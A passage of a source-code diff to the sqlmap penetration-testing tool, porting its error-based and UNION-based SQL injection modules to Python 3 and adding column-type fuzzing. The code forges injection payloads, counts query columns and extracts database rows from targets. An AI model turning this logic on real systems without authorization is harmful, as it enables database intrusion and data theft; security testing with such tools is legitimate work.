htmlunescape(retVal).replace("<br>", "\n") + if isinstance(retVal, six.string_types): + retVal = htmlUnescape(retVal).replace("<br>", "\n") retVal = _errorReplaceChars(retVal) - hashDBWrite(expression, retVal) + if retVal is not None: + hashDBWrite(expression, retVal) else: - _ = "%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop) - retVal = extractRegexResult(_, retVal, re.DOTALL | re.IGNORECASE) or retVal + _ = "(?si)%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop) + retVal = extractRegexResult(_, retVal) or retVal return safecharencode(retVal) if kb.safeCharEncode else retVal -def _errorFields(expression, expressionFields, expressionFieldsList, num=None, emptyFields=None): +def _errorFields(expression, expressionFields, expressionFieldsList, num=None, emptyFields=None, suppressOutput=False): values = [] origExpr = None + width = getConsoleWidth() threadData = getCurrentThreadData() for field in expressionFieldsList: @@ -186,10 +251,16 @@ def _errorFields(expression, expressionFields, expressionFieldsList, num=None, e if not kb.threadContinue: return None - if kb.fileReadMode and output and output.strip(): - print - elif output is not None and not (threadData.resumed and kb.suppressResumeInfo) and not (emptyFields and field in emptyFields): - logger.info("%s: %s" % ("resumed" if threadData.resumed else "retrieved", safecharencode(output))) + if not any((suppressOutput, kb.bruteMode)): + if kb.fileReadMode and output and output.strip(): + print() + elif output is not None and not (threadData.resumed and kb.suppressResumeInfo) and not (emptyFields and field in emptyFields): + status = "[%s] [INFO] %s: '%s'" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", output if kb.safeCharEncode else safecharencode(output)) + + if len(status) > width and not conf.noTruncate: + status = "%s..." 
% status[:width - 3] + + dataToStdout("%s\n" % status) if isinstance(num, int): expression = origExpr @@ -215,9 +286,9 @@ def _formatPartialContent(value): Prepares (possibly hex-encoded) partial content for safe console output """ - if value and isinstance(value, basestring): + if value and isinstance(value, six.string_types): try: - value = hexdecode(value) + value = decodeHex(value, binary=False) except: pass finally: @@ -231,7 +302,7 @@ def errorUse(expression, dump=False): SQL injection vulnerability on the affected parameter. """ - initTechnique(kb.technique) + initTechnique(getTechnique()) abortedFlag = False count = None @@ -243,24 +314,22 @@ def errorUse(expression, dump=False): _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression) + # Set kb.partRun in case the engine is called from the API + kb.partRun = getPartRun(alias=False) if conf.api else None + # We have to check if the SQL query might return multiple entries # and in such case forge the SQL limiting the query output one # entry at a time # NOTE: we assume that only queries that get data from a table can # return multiple entries - if (dump and (conf.limitStart or conf.limitStop)) or (" FROM " in \ - expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) \ - or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not \ - expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \ - and ("(CASE" not in expression.upper() or ("(CASE" in expression.upper() and "WHEN use" in expression))) \ - and not re.search(SQL_SCALAR_REGEX, expression, re.I): + if (dump and (conf.limitStart or conf.limitStop)) or (" FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and ("(CASE" not in expression.upper() or ("(CASE" in expression.upper() and "WHEN use" in expression))) and not re.search(SQL_SCALAR_REGEX, expression, re.I): expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump) if limitCond: # Count the number of SQL query entries output countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1) - if " ORDER BY " in expression.upper(): + if " ORDER BY " in countedExpression.upper(): _ = countedExpression.upper().rindex(" ORDER BY ") countedExpression = countedExpression[:_] @@ -273,110 +342,129 @@ def errorUse(expression, dump=False): else: stopLimit = int(count) - infoMsg = "the SQL query used returns " - infoMsg += "%d entries" % stopLimit - logger.info(infoMsg) + debugMsg = "used SQL query returns " + debugMsg += "%d %s" % (stopLimit, "entries" if stopLimit > 1 else "entry") + logger.debug(debugMsg) elif count and not count.isdigit(): warnMsg = "it was not possible to count the number " warnMsg += "of entries for the SQL query provided. 
" warnMsg += "sqlmap will assume that it returns only " warnMsg += "one entry" - logger.warn(warnMsg) + logger.warning(warnMsg) stopLimit = 1 - elif (not count or int(count) == 0): + elif not isNumPosStrValue(count): if not count: warnMsg = "the SQL query provided does not " warnMsg += "return any output" - logger.warn(warnMsg) + logger.warning(warnMsg) else: value = [] # for empty tables return value - if " ORDER BY " in expression and (stopLimit - startLimit) > SLOW_ORDER_COUNT_THRESHOLD: - message = "due to huge table size do you want to remove " - message += "ORDER BY clause gaining speed over consistency? [y/N] " - _ = readInput(message, default="N") - - if _ and _[0] in ("y", "Y"): - expression = expression[:expression.index(" ORDER BY ")] - - threadData = getCurrentThreadData() - threadData.shared.limits = iter(xrange(startLimit, stopLimit)) - numThreads = min(conf.threads, (stopLimit - startLimit)) - threadData.shared.value = BigArray() - threadData.shared.buffered = [] - threadData.shared.lastFlushed = startLimit - 1 - - if kb.dumpTable and (len(expressionFieldsList) < (stopLimit - startLimit) > CHECK_ZERO_COLUMNS_THRESHOLD): - for field in expressionFieldsList: - if _oneShotErrorUse("SELECT COUNT(%s) FROM %s" % (field, kb.dumpTable)) == '0': - emptyFields.append(field) - debugMsg = "column '%s' of table '%s' will not be " % (field, kb.dumpTable) - debugMsg += "dumped as it appears to be empty" - logger.debug(debugMsg) - - if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: - kb.suppressResumeInfo = True - debugMsg = "suppressing possible resume console info because of " - debugMsg += "large number of rows. It might take too long" - logger.debug(debugMsg) - - try: - def errorThread(): - threadData = getCurrentThreadData() - - while kb.threadContinue: - with kb.locks.limit: - try: - num = threadData.shared.limits.next() - except StopIteration: - break - - output = _errorFields(expression, expressionFields, expressionFieldsList, num, emptyFields) - - if not kb.threadContinue: - break - - if output and isListLike(output) and len(output) == 1: - output = output[0] - - with kb.locks.value: - index = None - for index in xrange(len(threadData.shared.buffered)): - if threadData.shared.buffered[index][0] >= num: + if isNumPosStrValue(count) and int(count) > 1: + if " ORDER BY " in expression and (stopLimit - startLimit) > SLOW_ORDER_COUNT_THRESHOLD: + message = "due to huge table size do you want to remove " + message += "ORDER BY clause gaining speed over consistency? [y/N] " + + if readInput(message, default='N', boolean=True): + expression = expression[:expression.index(" ORDER BY ")] + + numThreads = min(conf.threads, (stopLimit - startLimit)) + + threadData = getCurrentThreadData() + + try: + threadData.shared.limits = iter(xrange(startLimit, stopLimit)) + except OverflowError: + errMsg = "boundary limits (%d,%d) are too large. 
Please rerun " % (startLimit, stopLimit) + errMsg += "with switch '--fresh-queries'" + raise SqlmapDataException(errMsg) + + threadData.shared.value = BigArray() + threadData.shared.buffered = [] + threadData.shared.counter = 0 + threadData.shared.lastFlushed = startLimit - 1 + threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1 + + if threadData.shared.showEta: + threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit)) + + if kb.dumpTable and (len(expressionFieldsList) < (stopLimit - startLimit) > CHECK_ZERO_COLUMNS_THRESHOLD): + for field in expressionFieldsList: + if _oneShotErrorUse("SELECT COUNT(%s) FROM %s" % (field, kb.dumpTable)) == '0': + emptyFields.append(field) + debugMsg = "column '%s' of table '%s' will not be " % (field, kb.dumpTable) + debugMsg += "dumped as it appears to be empty" + logger.debug(debugMsg) + + if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: + kb.suppressResumeInfo = True + debugMsg = "suppressing possible resume console info because of " + debugMsg += "large number of rows. It might take too long" + logger.debug(debugMsg) + + try: + def errorThread(): + threadData = getCurrentThreadData() + + while kb.threadContinue: + with kb.locks.limit: + try: + threadData.shared.counter += 1 + num = next(threadData.shared.limits) + except StopIteration: break - threadData.shared.buffered.insert(index or 0, (num, output)) - while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[0][0]: - threadData.shared.lastFlushed += 1 - threadData.shared.value.append(threadData.shared.buffered[0][1]) - del threadData.shared.buffered[0] - runThreads(numThreads, errorThread) + output = _errorFields(expression, expressionFields, expressionFieldsList, num, emptyFields, threadData.shared.showEta) - except KeyboardInterrupt: - abortedFlag = True - warnMsg = "user aborted during enumeration. sqlmap " - warnMsg += "will display partial output" - logger.warn(warnMsg) + if not kb.threadContinue: + break - finally: - threadData.shared.value.extend(_[1] for _ in sorted(threadData.shared.buffered)) - value = threadData.shared.value - kb.suppressResumeInfo = False + if output and isListLike(output) and len(output) == 1: + output = unArrayizeValue(output) + + with kb.locks.value: + index = None + if threadData.shared.showEta: + threadData.shared.progress.progress(threadData.shared.counter) + for index in xrange(1 + len(threadData.shared.buffered)): + if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num: + break + threadData.shared.buffered.insert(index or 0, (num, output)) + while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[0][0]: + threadData.shared.lastFlushed += 1 + threadData.shared.value.append(threadData.shared.buffered[0][1]) + del threadData.shared.buffered[0] + + runThreads(numThreads, errorThread) + + except KeyboardInterrupt: + abortedFlag = True + warnMsg = "user aborted during enumeration. 
sqlmap " + warnMsg += "will display partial output" + logger.warning(warnMsg) + + finally: + threadData.shared.value.extend(_[1] for _ in sorted(threadData.shared.buffered)) + value = threadData.shared.value + kb.suppressResumeInfo = False if not value and not abortedFlag: value = _errorFields(expression, expressionFields, expressionFieldsList) - if value and isListLike(value) and len(value) == 1 and isinstance(value[0], basestring): - value = value[0] + if value and isListLike(value): + if len(value) == 1 and isinstance(value[0], (six.string_types, type(None))): + value = unArrayizeValue(value) + elif len(value) > 1 and stopLimit == 1: + value = [value] duration = calculateDeltaSeconds(start) if not kb.bruteMode: - debugMsg = "performed %d queries in %d seconds" % (kb.counters[kb.technique], duration) + debugMsg = "performed %d quer%s in %.2f seconds" % (kb.counters[getTechnique()], 'y' if kb.counters[getTechnique()] == 1 else "ies", duration) logger.debug(debugMsg) return value diff --git a/lib/techniques/union/__init__.py b/lib/techniques/union/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/lib/techniques/union/__init__.py +++ b/lib/techniques/union/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py index 76d0a1caef8..d5e8a44df05 100644 --- a/lib/techniques/union/test.py +++ b/lib/techniques/union/test.py @@ -1,16 +1,19 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import itertools +import logging import random import re from lib.core.agent import agent from lib.core.common import average from lib.core.common import Backend +from lib.core.common import getPublicTypeMembers from lib.core.common import isNullValue from lib.core.common import listToStrValue from lib.core.common import popValue @@ -19,24 +22,32 @@ from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import removeReflectiveValues +from lib.core.common import setTechnique from lib.core.common import singleTimeLogMessage from lib.core.common import singleTimeWarnMessage from lib.core.common import stdev -from lib.core.common import wasLastRequestDBMSError +from lib.core.common import wasLastResponseDBMSError +from lib.core.compat import xrange from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.data import queries +from lib.core.decorators import stackedmethod from lib.core.dicts import FROM_DUMMY_TABLE +from lib.core.enums import FUZZ_UNION_COLUMN from lib.core.enums import PAYLOAD +from lib.core.settings import FUZZ_UNION_ERROR_REGEX +from lib.core.settings import FUZZ_UNION_MAX_COLUMNS from lib.core.settings import LIMITED_ROWS_TEST_NUMBER -from lib.core.settings import UNION_MIN_RESPONSE_CHARS -from lib.core.settings import UNION_STDEV_COEFF -from lib.core.settings import MIN_RATIO from lib.core.settings import MAX_RATIO +from lib.core.settings import MIN_RATIO from lib.core.settings import MIN_STATISTICAL_RANGE from lib.core.settings import MIN_UNION_RESPONSES from lib.core.settings import NULL +from 
lib.core.settings import ORDER_BY_MAX from lib.core.settings import ORDER_BY_STEP +from lib.core.settings import UNION_MIN_RESPONSE_CHARS +from lib.core.settings import UNION_STDEV_COEFF from lib.core.unescaper import unescaper from lib.request.comparison import comparison from lib.request.connect import Connect as Request @@ -47,31 +58,35 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where= """ retVal = None - def _orderByTechnique(): + @stackedmethod + def _orderByTechnique(lowerCount=None, upperCount=None): def _orderByTest(cols): query = agent.prefixQuery("ORDER BY %d" % cols, prefix=prefix) query = agent.suffixQuery(query, suffix=suffix, comment=comment) payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where) - page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) - return not re.search(r"(warning|error|order by|failed)", page or "", re.I) and comparison(page, headers) or re.search(r"data types cannot be compared or sorted", page or "", re.I) + page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False) + return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order (by|clause)", "unknown column", "failed")) and not kb.heavilyDynamic and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I) is not None - if _orderByTest(1) and not _orderByTest(randomInt()): - infoMsg = "ORDER BY technique seems to be usable. " + if _orderByTest(1 if lowerCount is None else lowerCount) and not _orderByTest(randomInt() if upperCount is None else upperCount + 1): + infoMsg = "'ORDER BY' technique appears to be usable. " infoMsg += "This should reduce the time needed " infoMsg += "to find the right number " infoMsg += "of query columns. 
Automatically extending the " infoMsg += "range for current UNION query injection technique test" singleTimeLogMessage(infoMsg) - lowCols, highCols = 1, ORDER_BY_STEP + lowCols, highCols = 1 if lowerCount is None else lowerCount, ORDER_BY_STEP if upperCount is None else upperCount found = None while not found: - if _orderByTest(highCols): + if not conf.uCols and _orderByTest(highCols): lowCols = highCols highCols += ORDER_BY_STEP + + if highCols > ORDER_BY_MAX: + break else: while not found: - mid = highCols - (highCols - lowCols) / 2 + mid = highCols - (highCols - lowCols) // 2 if _orderByTest(mid): lowCols = mid else: @@ -81,77 +96,118 @@ def _orderByTest(cols): return found - pushValue(kb.errorIsNone) - items, ratios = [], [] - kb.errorIsNone = False - lowerCount, upperCount = conf.uColsStart, conf.uColsStop + try: + pushValue(kb.errorIsNone) + items, ratios = [], [] + kb.errorIsNone = False + lowerCount, upperCount = conf.uColsStart, conf.uColsStop - if lowerCount == 1: - found = kb.orderByColumns or _orderByTechnique() - if found: - kb.orderByColumns = found - infoMsg = "target url appears to have %d column%s in query" % (found, 's' if found > 1 else "") - singleTimeLogMessage(infoMsg) - return found + if kb.orderByColumns is None and (lowerCount == 1 or conf.uCols): # Note: ORDER BY is not bullet-proof + found = _orderByTechnique(lowerCount, upperCount) if conf.uCols else _orderByTechnique() - if abs(upperCount - lowerCount) < MIN_UNION_RESPONSES: - upperCount = lowerCount + MIN_UNION_RESPONSES + if found: + kb.orderByColumns = found + infoMsg = "target URL appears to have %d column%s in query" % (found, 's' if found > 1 else "") + singleTimeLogMessage(infoMsg) + return found + elif kb.futileUnion: + return None - min_, max_ = MAX_RATIO, MIN_RATIO - pages = {} + if abs(upperCount - lowerCount) < MIN_UNION_RESPONSES: + upperCount = lowerCount + MIN_UNION_RESPONSES + + min_, max_ = MAX_RATIO, MIN_RATIO + pages = {} + + for count in xrange(lowerCount, upperCount + 1): + query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where) + payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) + page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False) + + if not isNullValue(kb.uChar): + pages[count] = page + + ratio = comparison(page, headers, code, getRatioValue=True) or MIN_RATIO + ratios.append(ratio) + min_, max_ = min(min_, ratio), max(max_, ratio) + items.append((count, ratio)) - for count in xrange(lowerCount, upperCount + 1): - query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where) - payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) - page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) if not isNullValue(kb.uChar): - pages[count] = page - ratio = comparison(page, headers, getRatioValue=True) or MIN_RATIO - ratios.append(ratio) - min_, max_ = min(min_, ratio), max(max_, ratio) - items.append((count, ratio)) - - if not isNullValue(kb.uChar): - for regex in (kb.uChar, r'>\s*%s\s*<' % kb.uChar): - contains = [(count, re.search(regex, page or "", re.IGNORECASE) is not None) for count, page in pages.items()] - if len(filter(lambda x: x[1], contains)) == 1: - retVal = filter(lambda x: x[1], contains)[0][0] - break + value = re.escape(kb.uChar.strip("'")) + for regex in (value, r'>\s*%s\s*<' % value): + contains = [count for count, content in pages.items() if re.search(regex, content or "", 
re.IGNORECASE) is not None] + if len(contains) == 1: + retVal = contains[0] + break + + if not retVal: + if min_ in ratios: + ratios.pop(ratios.index(min_)) + if max_ in ratios: + ratios.pop(ratios.index(max_)) + + minItem, maxItem = None, None + + for item in items: + if item[1] == min_: + minItem = item + elif item[1] == max_: + maxItem = item + + if all(_ == min_ and _ != max_ for _ in ratios): + retVal = maxItem[0] + + elif all(_ != min_ and _ == max_ for _ in ratios): + retVal = minItem[0] + + elif abs(max_ - min_) >= MIN_STATISTICAL_RANGE: + deviation = stdev(ratios) - if not retVal: - ratios.pop(ratios.index(min_)) - ratios.pop(ratios.index(max_)) + if deviation is not None: + lower, upper = average(ratios) - UNION_STDEV_COEFF * deviation, average(ratios) + UNION_STDEV_COEFF * deviation - minItem, maxItem = None, None + if min_ < lower: + retVal = minItem[0] - for item in items: - if item[1] == min_: - minItem = item - elif item[1] == max_: - maxItem = item + if max_ > upper: + if retVal is None or abs(max_ - upper) > abs(min_ - lower): + retVal = maxItem[0] + finally: + kb.errorIsNone = popValue() + + if retVal: + infoMsg = "target URL appears to be UNION injectable with %d columns" % retVal + singleTimeLogMessage(infoMsg, logging.INFO, re.sub(r"\d+", 'N', infoMsg)) - if all(map(lambda x: x == min_ and x != max_, ratios)): - retVal = maxItem[0] + return retVal - elif all(map(lambda x: x != min_ and x == max_, ratios)): - retVal = minItem[0] +def _fuzzUnionCols(place, parameter, prefix, suffix): + retVal = None - elif abs(max_ - min_) >= MIN_STATISTICAL_RANGE: - deviation = stdev(ratios) - lower, upper = average(ratios) - UNION_STDEV_COEFF * deviation, average(ratios) + UNION_STDEV_COEFF * deviation + if Backend.getIdentifiedDbms() and not re.search(FUZZ_UNION_ERROR_REGEX, kb.pageTemplate or "") and kb.orderByColumns: + comment = queries[Backend.getIdentifiedDbms()].comment.query - if min_ < lower: - retVal = minItem[0] + choices = getPublicTypeMembers(FUZZ_UNION_COLUMN, True) + random.shuffle(choices) - if max_ > upper: - if retVal is None or abs(max_ - upper) > abs(min_ - lower): - retVal = maxItem[0] + for candidate in itertools.product(choices, repeat=kb.orderByColumns): + if retVal: + break + elif FUZZ_UNION_COLUMN.STRING not in candidate: + continue + else: + candidate = [_.replace(FUZZ_UNION_COLUMN.INTEGER, str(randomInt())).replace(FUZZ_UNION_COLUMN.STRING, "'%s'" % randomStr(20)) for _ in candidate] - kb.errorIsNone = popValue() + query = agent.prefixQuery("UNION ALL SELECT %s%s" % (','.join(candidate), FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), "")), prefix=prefix) + query = agent.suffixQuery(query, suffix=suffix, comment=comment) + payload = agent.payload(newValue=query, place=place, parameter=parameter, where=PAYLOAD.WHERE.NEGATIVE) + page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False) - if retVal: - infoMsg = "target url appears to be UNION injectable with %d columns" % retVal - singleTimeLogMessage(infoMsg) + if not re.search(FUZZ_UNION_ERROR_REGEX, page or ""): + for column in candidate: + if column.startswith("'") and column.strip("'") in (page or ""): + retVal = [(_ if _ != column else "%s") for _ in candidate] + break return retVal @@ -159,79 +215,79 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO validPayload = None vector = None - positions = range(0, count) + positions = [_ for _ in xrange(0, count)] # Unbiased approach for searching appropriate usable column 
random.shuffle(positions) - # For each column of the table (# of NULL) perform a request using - # the UNION ALL SELECT statement to test it the target url is - # affected by an exploitable union SQL injection vulnerability - for position in positions: - # Prepare expression with delimiters - randQuery = randomStr(UNION_MIN_RESPONSE_CHARS) - phrase = "%s%s%s".lower() % (kb.chars.start, randQuery, kb.chars.stop) - randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery) - randQueryUnescaped = unescaper.escape(randQueryProcessed) - - # Forge the union SQL injection request - query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where) - payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) - - # Perform the request - page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) - content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \ - removeReflectiveValues(listToStrValue(headers.headers if headers else None), \ - payload, True) or "") - - if content and phrase in content: - validPayload = payload - kb.unionDuplicates = content.count(phrase) > 1 - vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates) - - if where == PAYLOAD.WHERE.ORIGINAL: - # Prepare expression with delimiters - randQuery2 = randomStr(UNION_MIN_RESPONSE_CHARS) - phrase2 = "%s%s%s".lower() % (kb.chars.start, randQuery2, kb.chars.stop) - randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2) - randQueryUnescaped2 = unescaper.escape(randQueryProcessed2) - - # Confirm that it is a full union SQL injection - query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2) - payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) - - # Perform the request - page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) - content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "") - - if not all(_ in content for _ in (phrase, phrase2)): - vector = (position, count, comment, prefix, suffix, kb.uChar, PAYLOAD.WHERE.NEGATIVE, kb.unionDuplicates) - elif not kb.unionDuplicates: - fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr()) - - # Check for limited row output - query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable) + for charCount in (UNION_MIN_RESPONSE_CHARS << 2, UNION_MIN_RESPONSE_CHARS): + if vector: + break + + # For each column of the table (# of NULL) perform a request using + # the UNION ALL SELECT statement to test it the target URL is + # affected by an exploitable union SQL injection vulnerability + for position in positions: + # Prepare expression with delimiters + randQuery = randomStr(charCount) + phrase = ("%s%s%s" % (kb.chars.start, randQuery, kb.chars.stop)).lower() + randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery) + randQueryUnescaped = unescaper.escape(randQueryProcessed) + + # Forge the union SQL injection request + query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where) + payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) + + 
# Perform the request + page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False) + content = ("%s%s" % (removeReflectiveValues(page, payload) or "", removeReflectiveValues(listToStrValue(headers.headers if headers else None), payload, True) or "")).lower() + + if content and phrase in content: + validPayload = payload + kb.unionDuplicates = len(re.findall(phrase, content, re.I)) > 1 + vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, conf.forcePartial, kb.tableFrom, kb.unionTemplate) + + if where == PAYLOAD.WHERE.ORIGINAL: + # Prepare expression with delimiters + randQuery2 = randomStr(charCount) + phrase2 = ("%s%s%s" % (kb.chars.start, randQuery2, kb.chars.stop)).lower() + randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2) + randQueryUnescaped2 = unescaper.escape(randQueryProcessed2) + + # Confirm that it is a full union SQL injection + query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2) payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) # Perform the request - page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) - content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \ - removeReflectiveValues(listToStrValue(headers.headers if headers else None), \ - payload, True) or "") - if content.count(phrase) > 0 and content.count(phrase) < LIMITED_ROWS_TEST_NUMBER: - warnMsg = "output with limited number of rows detected. Switching to partial mode" - logger.warn(warnMsg) - vector = (position, count, comment, prefix, suffix, kb.uChar, PAYLOAD.WHERE.NEGATIVE, kb.unionDuplicates) - - unionErrorCase = kb.errorIsNone and wasLastRequestDBMSError() - - if unionErrorCase and count > 1: - warnMsg = "combined UNION/error-based SQL injection case found on " - warnMsg += "column %d. sqlmap will try to find another " % (position + 1) - warnMsg += "column with better characteristics" - logger.warn(warnMsg) - else: - break + page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False) + content = ("%s%s" % (page or "", listToStrValue(headers.headers if headers else None) or "")).lower() + + if not all(_ in content for _ in (phrase, phrase2)): + vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True, kb.tableFrom, kb.unionTemplate) + elif not kb.unionDuplicates: + fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr()) + + # Check for limited row output + query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable) + payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) + + # Perform the request + page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False) + content = ("%s%s" % (removeReflectiveValues(page, payload) or "", removeReflectiveValues(listToStrValue(headers.headers if headers else None), payload, True) or "")).lower() + if content.count(phrase) > 0 and content.count(phrase) < LIMITED_ROWS_TEST_NUMBER: + warnMsg = "output with limited number of rows detected. 
Switching to partial mode" + logger.warning(warnMsg) + vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True, kb.tableFrom, kb.unionTemplate) + + unionErrorCase = kb.errorIsNone and wasLastResponseDBMSError() + + if unionErrorCase and count > 1: + warnMsg = "combined UNION/error-based SQL injection case found on " + warnMsg += "column %d. sqlmap will try to find another " % (position + 1) + warnMsg += "column with better characteristics" + logger.warning(warnMsg) + else: + break return validPayload, vector @@ -252,33 +308,45 @@ def _unionConfirm(comment, place, parameter, prefix, suffix, count): def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix): """ - This method tests if the target url is affected by an union + This method tests if the target URL is affected by an union SQL injection vulnerability. The test is done up to 50 columns on the target database table """ validPayload = None vector = None + orderBy = kb.orderByColumns + uChars = (conf.uChar, kb.uChar) + where = PAYLOAD.WHERE.ORIGINAL if isNullValue(kb.uChar) else PAYLOAD.WHERE.NEGATIVE # In case that user explicitly stated number of columns affected if conf.uColsStop == conf.uColsStart: count = conf.uColsStart else: - count = _findUnionCharCount(comment, place, parameter, value, prefix, suffix, PAYLOAD.WHERE.ORIGINAL if isNullValue(kb.uChar) else PAYLOAD.WHERE.NEGATIVE) + count = _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where) if count: validPayload, vector = _unionConfirm(comment, place, parameter, prefix, suffix, count) - if not all([validPayload, vector]) and not all([conf.uChar, conf.dbms]): + if not all((validPayload, vector)) and not all((conf.uChar, conf.dbms, kb.unionTemplate)): + if Backend.getIdentifiedDbms() and kb.orderByColumns and kb.orderByColumns < FUZZ_UNION_MAX_COLUMNS: + if kb.fuzzUnionTest is None: + msg = "do you want to (re)try to find proper " + msg += "UNION column types with fuzzy test? [y/N] " + + kb.fuzzUnionTest = readInput(msg, default='N', boolean=True) + if kb.fuzzUnionTest: + kb.unionTemplate = _fuzzUnionCols(place, parameter, prefix, suffix) + warnMsg = "if UNION based SQL injection is not detected, " warnMsg += "please consider " - if not conf.uChar and count > 1 and kb.uChar == NULL: + if not conf.uChar and count > 1 and kb.uChar == NULL and conf.uValues is None: message = "injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] " - test = readInput(message, default="Y") - if test[0] not in ("y", "Y"): + + if not readInput(message, default='Y', boolean=True): warnMsg += "usage of option '--union-char' " - warnMsg += "(e.g. --union-char=1) " + warnMsg += "(e.g. '--union-char=1') " else: conf.uChar = kb.uChar = str(randomInt(2)) validPayload, vector = _unionConfirm(comment, place, parameter, prefix, suffix, count) @@ -288,24 +356,45 @@ def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix) warnMsg += "and/or try to force the " else: warnMsg += "forcing the " - warnMsg += "back-end DBMS (e.g. --dbms=mysql) " + warnMsg += "back-end DBMS (e.g. '--dbms=mysql') " - if not all([validPayload, vector]) and not warnMsg.endswith("consider "): + if not all((validPayload, vector)) and not warnMsg.endswith("consider "): singleTimeWarnMessage(warnMsg) + if orderBy is None and kb.orderByColumns is not None and not all((validPayload, vector)): # discard ORDER BY results (not usable - e.g. 
